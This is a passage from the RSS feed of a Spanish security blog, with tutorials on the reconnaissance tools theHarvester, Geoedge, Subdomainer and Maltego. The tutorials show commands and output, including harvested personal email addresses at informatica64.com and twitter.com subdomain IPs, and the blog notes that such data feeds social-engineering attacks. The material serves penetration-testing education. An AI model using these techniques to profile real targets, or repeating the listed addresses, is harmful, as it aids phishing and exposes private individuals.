			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.edge-security.com/theHarvester.php" target="_blank"><strong>theHarvester</strong></a> (Desarrollada por <a href="http://www.edge-security.com/" target="_blank"><strong>Edge-Security</strong></a>) es una herramienta que permite recolectar direcciones electrónicas (e-mails) y nombres de usuarios desde fuentes públicas.</p>
<p style="text-align: justify;"><span id="more-434"></span>Estas son:</p>
<p style="text-align: justify;"><a href="http://www.google.com" target="_blank">Google</a> (e-mails), <a href="http://www.bing.com/" target="_blank">Bing search</a> (e-mails), <a href="http://pgp.mit.edu/" target="_blank">PgP servers</a> (e-mails) y <a href="http://www.linkedin.com/" target="_blank">Linkedin</a> (user names)</p>
<p style="text-align: justify;">El objetivo de este proceso será el de recolectar información  (correos electrónicos / nombres de usuarios) referente a un determinado objetivo (dominio) en tareas relacionadas con los <a href="http://www.sec-track.com/test-de-penetracion" target="_blank">test de penetración</a> o <a href="http://www.sec-track.com/test-de-penetracion" target="_blank">ethical hacking</a>. Ya que dicha información permitirá realizar ataques más sofisticados y relacionados directamente con la ingeniería social.</p>
<p style="text-align: justify;"><strong>Veamos:</strong></p>
<p style="text-align: justify;">Primero <a href="http://www.edge-security.com/soft/theHarvester-1.5.tar" target="_blank"><strong>descargamos la herramienta theHarvester</strong></a> (script desarrollado en Python)</p>
<p style="text-align: left;"><strong>root@bt:~/Sec-Track/Tools/Information Gathering/theHarvester# ls</strong><br />
COPYING  LICENSES  README  theHarvester.py</p>
<p style="text-align: justify;"><strong>Modo de uso:</strong></p>
<p style="text-align: left;"><strong>root@bt:~/Sec-Track/Tools/Information Gathering/theHarvester# ./theHarvester.py </strong><br />
*************************************<br />
*TheHarvester Ver. 1.5              *<br />
*Coded by Christian Martorella      *<br />
*Edge-Security Research             *<br />
*cmartorella@edge-security.com      *<br />
*************************************<br />
Usage: theharvester options</p>
<p>-d: domain to search or company name<br />
-b: data source (google,bing,pgp,linkedin)<br />
-l: limit the number of results to work with(bing goes from 50 to 50 results,<br />
google 100 to 100, and pgp does&#8217;nt use this option)</p>
<p>Examples:./theharvester.py -d microsoft.com -l 500 -b google<br />
./theharvester.py -d microsoft.com -b pgp<br />
./theharvester.py -d microsoft -l 200 -b linkedin</p>
<p style="text-align: justify;"><strong>Ahora relicemos una consulta con google como fuente pública:</strong></p>
<p style="text-align: left;"><strong>root@bt:~/Sec-Track/Tools/Information Gathering/theHarvester# ./theHarvester.py -d informatica64.com -l 500 -b google</strong></p>
<p>*************************************<br />
*TheHarvester Ver. 1.5              *<br />
*Coded by Christian Martorella      *<br />
*Edge-Security Research             *<br />
*cmartorella@edge-security.com      *<br />
*************************************<br />
Searching for informatica64.com in google :<br />
======================================</p>
<p>Total results:  26900<br />
Limit:  500<br />
Searching results: 0<br />
Searching results: 100<br />
Searching results: 200<br />
Searching results: 300<br />
Searching results: 400</p>
<p>Accounts found:<br />
====================</p>
<p>@informatica64.com<br />
amartin@informatica64.com<br />
chema@informatica64.com<br />
rodol@informatica64.com<br />
calendariotorrido@informatica64.com<br />
[registro@informatica64.com<br />
registro@informatica64.com<br />
jsaenz@informatica64.com<br />
jlrambla@informatica64.com<br />
i64@informatica64.com<br />
ralonso@informatica64.com<br />
plaguna@informatica64.com<br />
igor@informatica64.com<br />
Chema@informatica64.com<br />
technews@informatica64.com<br />
gema@informatica64.com<br />
amigosdelafoca@informatica64.com<br />
sbordon@informatica64.com<br />
[chema@informatica64.com<br />
====================</p>
<p>Total results:  19</p>
<p style="text-align: justify;"><strong>Ahora relicemos una consulta con bing como fuente pública:</strong></p>
<p style="text-align: left;"><strong>root@bt:~/Sec-Track/Tools/Information Gathering/theHarvester# ./theHarvester.py -d informatica64.com -l 500 -b bing</strong></p>
<p>*************************************<br />
*TheHarvester Ver. 1.5              *<br />
*Coded by Christian Martorella      *<br />
*Edge-Security Research             *<br />
*cmartorella@edge-security.com      *<br />
*************************************<br />
Searching for informatica64.com in bing :<br />
======================================</p>
<p>Total results:  489<br />
Limit:  489<br />
Searching results: 0<br />
Searching results: 50<br />
Searching results: 100<br />
Searching results: 150<br />
Searching results: 200<br />
Searching results: 250<br />
Searching results: 300<br />
Searching results: 350<br />
Searching results: 400<br />
Searching results: 450</p>
<p>Accounts found:<br />
====================</p>
<p>@informatica64.com<br />
chema@informatica64.com<br />
amartin@informatica64.com<br />
i64@informatica64.com<br />
jsaenz@informatica64.com<br />
[registro@informatica64.com<br />
registro@informatica64.com<br />
mfernandez@informatica64.com<br />
calendariotorrido@informatica64.com<br />
jalonso@informatica64.com<br />
rodol@informatica64.com<br />
jmalonso@informatica64.com<br />
sbordon@informatica64.com<br />
====================</p>
<p>Total results:  13</p>
<p style="text-align: justify;"><a href="http://www.edge-security.com/theHarvester.php" target="_blank"><strong>Más información y descarga de la herramienta theHarvester &gt;&gt;</strong></a><strong><br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/tool-theharvester-recoleccion-de-correos-electronicos-y-nombres-de-usuarios/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Tool: Geoedge, Ubicación Geográfica de una IP / Hostname</title>
		<link>http://www.sec-track.com/tool-geoedge-ubicacion-geografica-de-una-ip-hostname</link>
		<comments>http://www.sec-track.com/tool-geoedge-ubicacion-geografica-de-una-ip-hostname#comments</comments>
		<pubDate>Tue, 16 Feb 2010 19:15:04 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Hacking Tools]]></category>
		<category><![CDATA[Information Gathering]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=428</guid>
		<description><![CDATA[Geoedge (Desarrollada por Edge-security) es una herramienta que nos permite ubicar geográficamente una dirección IP o Hostname objetivo, a través de los servicios MaxMind y GeoIPTool.
Su modo de uso es bastante simple, pues solo necesitamos descargar el script desarrollado en Python y desde la línea de comandos ejecutar la consulta. Para que esta sea reflejada [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.edge-security.com/geoedge.php" target="_blank"><strong>Geoedge </strong></a>(Desarrollada por<a href="http://www.edge-security.com" target="_blank"> <strong>Edge-security</strong></a>) es una herramienta que nos permite ubicar geográficamente una dirección IP o Hostname objetivo, a través de los servicios <a href="http://www.maxmind.com/" target="_blank"><strong>MaxMind</strong></a> y<a href="http://www.geoiptool.com/" target="_blank"><strong> GeoIPTool</strong></a>.</p>
<p style="text-align: justify;"><span id="more-428"></span>Su modo de uso es bastante simple, pues solo necesitamos descargar el script desarrollado en Python y desde la línea de comandos ejecutar la consulta. Para que esta sea reflejada en<a href="http://maps.google.es/" target="_blank"><strong> GoogleMaps</strong></a> y <a href="http://www.mapquest.com/" target="_blank"><strong>MapQuest</strong></a>.</p>
<p style="text-align: justify;"><strong>Veamos:</strong></p>
<p style="text-align: justify;"><strong>C:\Python26&gt;python.exe geoedge.py</strong><br />
*************************************<br />
*Geoedge         v0.2               *<br />
*Coded by Christian Martorella      *<br />
*cmartorella@edge-security.com      *<br />
*************************************<br />
Usage:<br />
python geoedge.py host/ip</p>
<p style="text-align: justify;"><strong>Ahora hagamos una consulta:</strong></p>
<p style="text-align: justify;"><strong>C:\Python26&gt;python.exe geoedge.py www.informatica64.com</strong><br />
*************************************<br />
*Geoedge         v0.2               *<br />
*Coded by Christian Martorella      *<br />
*cmartorella@edge-security.com      *<br />
*************************************<br />
Searching in Maxmind&#8230;.</p>
<p>Information for www.informatica64.com by Maxmind<br />
===========================================</p>
<p>IP/Host: www.informatica64.com<br />
Country: ES,Spain<br />
City: Madrid,Madrid<br />
Coordinates: 40.4000,-3.6833<br />
Provider: SPAIN,SPAIN<br />
Google Maps Link: <a href="http://maps.google.com/maps?q=40.4000, -3.6833" target="_blank">http://maps.google.com/maps?q=40.4000, -3.6833</a><br />
Mapquest Link:<a href="http://www.mapquest.es/mq/maps/latlong.do?pageId=latlong&amp;latLongT ype=decimal&amp;txtLatitude=40.4000&amp;txtLongitude=-3.6833" target="_blank"> http://www.mapquest.es/mq/maps/latlong.do?pageId=latlong&amp;latLongT<br />
ype=decimal&amp;txtLatitude=40.4000&amp;txtLongitude=-3.6833</a></p>
<p style="text-align: justify;">Searching in Geoiptool&#8230;.</p>
<p>Information by Geoiptool<br />
========================</p>
<p>IP/Host: 80.81.106.148<br />
Country:  Spain ,ES (ESP)<br />
City: Madrid,Madrid<br />
Coordinates: 40.4,-3.6833</p>
<p style="text-align: justify;"><strong>En imágenes:</strong></p>
<p style="text-align: justify;">GoogleMaps:</p>
<p style="text-align: justify;"><img class="aligncenter" title="Maps" src="http://img138.imageshack.us/img138/8523/googlemaps.jpg" alt="" width="599" height="370" /></p>
<p style="text-align: justify;">MapQuest:</p>
<p style="text-align: justify;"><img class="aligncenter" title="quest" src="http://img220.imageshack.us/img220/6883/mapquest.jpg" alt="" width="469" height="358" /></p>
<p style="text-align: justify;">Obviamente los resultados pueden no ser completamente precisos, pues existen muchas variables que inciden sobre estos.</p>
<p style="text-align: justify;"><a href="http://www.edge-security.com/geoedge.php" target="_blank"><strong>Más información y descarga &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/tool-geoedge-ubicacion-geografica-de-una-ip-hostname/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tool: Subdomainer, Búsqueda de subdominios de un dominio objetivo</title>
		<link>http://www.sec-track.com/tool-subdomainer-busqueda-de-subdominios-de-un-dominio-objetivo</link>
		<comments>http://www.sec-track.com/tool-subdomainer-busqueda-de-subdominios-de-un-dominio-objetivo#comments</comments>
		<pubDate>Fri, 12 Feb 2010 08:53:03 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Information Gathering]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=424</guid>
		<description><![CDATA[Subdomainer (desarrollada por edge-security)es una herramienta de recolección de información diseñada para obtener nombres de subdominios de un dominio objetivo, desde diferentes fuentes públicas como Google, Msn Search, Yahoo, Servidores PgP, etc.
Veamos la herramienta en ejecución:
Primero descargamos la herramienta Subdomainer desde la web oficial del proyecto.
La herramienta ha sido desarrollada en Python, por lo tanto [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Subdomainer (desarrollada por <a href="http://www.edge-security.com" target="_blank"><strong>edge-security</strong></a>)es una herramienta de recolección de información diseñada para obtener nombres de subdominios de un dominio objetivo, desde diferentes fuentes públicas como Google, Msn Search, Yahoo, Servidores PgP, etc.</p>
<p style="text-align: justify;">Veamos la herramienta en ejecución:</p>
<p style="text-align: justify;">Primero <a href="http://www.edge-security.com/soft/subdomainer-1.3b.tar" target="_blank"><strong>descargamos la herramienta Subdomainer</strong></a> desde la web oficial del proyecto.</p>
<p style="text-align: justify;">La herramienta ha sido desarrollada en <a href="http://es.wikipedia.org/wiki/Python" target="_blank"><strong>Python</strong></a>, por lo tanto necesitarás de este para ejecutarla. (Python ya viene incluído en <a href="http://www.sec-track.com/tag/backtrack" target="_blank"><strong>BackTrack</strong></a>).</p>
<p style="text-align: justify;">Una vez descargada, nos dirigimos al directorio, extraemos los archivos y ejecutamos la herramienta.</p>
<p style="text-align: justify;">root@bt:~/Sec-Track/Tools/Information Gathering/subdomainer# ls<br />
COPYING  LICENSES  README  <strong>subdomainer.py</strong></p>
<p style="text-align: justify;">Veamos la opciones:</p>
<p style="text-align: justify;"><strong>root@bt:~/Sec-Track/Tools/Information Gathering/subdomainer# python subdomainer.py</strong><br />
*************************************<br />
*Subdomainer Ver. 1.3b              *<br />
*Coded by Christian Martorella      *<br />
*Edge-Security Research             *<br />
*laramies2k@yahoo.com.ar            *<br />
*************************************<br />
usage: subdomainer.py  options<br />
-d: domain to search<br />
-l: limit of results to work with. (msn and yahoo goes in 10 to 10<br />
google in 100&#8217;s, and pgp does not need this option)<br />
-m: data source (msn, yahoo, google, pgp-veridis, all)<br />
-o: output to html file. (optional, good for long lists.)<br />
Example:<br />
subdomainer.py -d microsoft.com -l 200 -m google</p>
<p style="text-align: justify;">subdomainer.py -d microsoft.com -l 100 -m all -o microsoft.html</p>
<h3 style="text-align: justify;">Ahora hagamos una búsqueda nosotros mismos:</h3>
<p style="text-align: justify;"><strong>root@bt:~/Sec-Track/Tools/Information Gathering/subdomainer# python subdomainer.py -d twitter.com -l 100 -m google</strong><br />
*************************************<br />
*Subdomainer Ver. 1.3b              *<br />
*Coded by Christian Martorella      *<br />
*Edge-Security Research             *<br />
*laramies2k@yahoo.com.ar            *<br />
*************************************<br />
Searching for twitter.com in google<br />
=======================================<br />
Total results:  434000000<br />
Limit:  100<br />
Searching results: 0<br />
Subdomains founded:<br />
====================<br />
search.twitter.com<br />
blog.twitter.com<br />
status.twitter.com<br />
apiwiki.twitter.com<br />
help.twitter.com<br />
blog.es.twitter.com<br />
chirp.twitter.com<br />
engineering.twitter.com</p>
<p style="text-align: justify;">Total results:  8<br />
Going for extra check:</p>
<p>search.twitter.com ====&gt; 128.121.146.107<br />
blog.twitter.com ====&gt; 74.125.47.121<br />
status.twitter.com ====&gt; 72.32.231.8<br />
apiwiki.twitter.com ====&gt; 208.96.32.3<br />
help.twitter.com ====&gt; 67.219.156.130<br />
blog.es.twitter.com ====&gt; 74.125.47.121<br />
chirp.twitter.com ====&gt; 209.207.239.72<br />
engineering.twitter.com ====&gt; 74.125.47.121</p>
<p style="text-align: justify;">Como vemos, una vez identifica los posibles nombres de subdominios basados en consultas a los motores que hayamos seleccionado, procede a verficar la validez de estos.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/tool-subdomainer-busqueda-de-subdominios-de-un-dominio-objetivo/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tool: Maltego, Herramienta de Inteligencia, Análisis Forense y Recolección de Información</title>
		<link>http://www.sec-track.com/tool-maltego-herramienta-de-inteligencia-analisis-forense-y-recoleccion-de-informacion</link>
		<comments>http://www.sec-track.com/tool-maltego-herramienta-de-inteligencia-analisis-forense-y-recoleccion-de-informacion#comments</comments>
		<pubDate>Wed, 10 Feb 2010 11:17:44 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Análisis Forense Digital]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Information Gathering]]></category>
		<category><![CDATA[Maltego]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=419</guid>
		<description><![CDATA[La herramienta Maltego (desarrollada por Paterva) es una herramienta que permite realizar recolecciones de información en Internet así como la representación de la misma en formatos fáciles de interpretar.
Maltego hace uso de varias librerías gráficas que permiten identificar las relaciones entre la información que se está consultando en los diferentes motores de búsqueda que implementa, [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">La herramienta <a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank"><strong>Maltego</strong></a> (desarrollada por <a href="http://www.paterva.com" target="_blank"><strong>Paterva</strong></a>) es una herramienta que permite realizar recolecciones de información en Internet así como la representación de la misma en formatos fáciles de interpretar.</p>
<p style="text-align: justify;"><span id="more-419"></span><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank"><strong>Maltego</strong></a> hace uso de varias librerías gráficas que permiten identificar las relaciones entre la información que se está consultando en los diferentes motores de búsqueda que implementa, permitiendo de esta manera organizar todo un mapa de relaciones entre resultados.</p>
<p style="text-align: justify;"><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank"><strong></strong></a><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank"><strong>Maltego</strong></a> puede ser descargada de manera gratuita (<strong><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank">Community Edition</a></strong>) para sistemas Windows y Linux, además ofrece una versión comercial, (<a href="http://www.paterva.com/web4/index.php/client/commercial-edition" target="_blank"><strong>Comercial Edition</strong></a>) la cual entre otras bondades, permite realizar búsquedas aun más profundas y exportar y/o salvar los resultados obtenidos.</p>
<p style="text-align: justify;"><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank">Maltego</a> viene incluía en <a href="http://www.sec-track.com/tag/backtrack" target="_blank"><strong>BackTrack</strong></a> y nos permitirá entonces enumerar la  información referente a redes, dominios, personas, emails y datos  personales. Algunos de estos datos son:</p>
<ul style="text-align: justify;">
<li>Nombres de dominio</li>
<li>Información WHOIS</li>
<li>Nombres DNS</li>
<li>Bloques de red</li>
<li>Direcciones IP</li>
<li>Dirección de correo electrónico asociada con un nombre de persona</li>
<li>Sitios web asociados con un nombre de persona</li>
<li>Números telefónicos asociados con un nombre de persona</li>
<li>Grupos sociales que están asociados con un nombre de persona</li>
<li>Compañías y organizaciones asociadas con un nombre de persona</li>
<li>Hacer una verificación simple de las direcciones de correo  electrónico</li>
<li>Búsqueda de blogs y referencias por frases</li>
<li>Identificar vínculos entrantes para sitios web</li>
<li>Extraer metadatos desde archivos y fuentes de dominios</li>
</ul>
<p style="text-align: justify;">Veamos un ejemplo de consulta a la web del proyecto Sec-Track:</p>
<p style="text-align: justify;"><img class="aligncenter" title="Maltego" src="http://img203.imageshack.us/img203/5858/maltego.jpg" alt="" width="450" height="317" /></p>
<p style="text-align: justify;">En la imagen se puede observar como realicé una consulta por el sitio Web Sec-Track, a partir de allí obtenemos datos como el dominio de la web, la dirección IP, Correos electrónicos publicados, enlaces, etc&#8230;</p>
<p style="text-align: justify;"><strong><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank">Para más información y descarga de la herramienta, visita la página oficial del proyecto Maltego</a>.</strong></p>
<p style="text-align: justify;">Pronto seguiré con varios post relacionados al uso específico de esta genial herramienta.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/tool-maltego-herramienta-de-inteligencia-analisis-forense-y-recoleccion-de-informacion/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
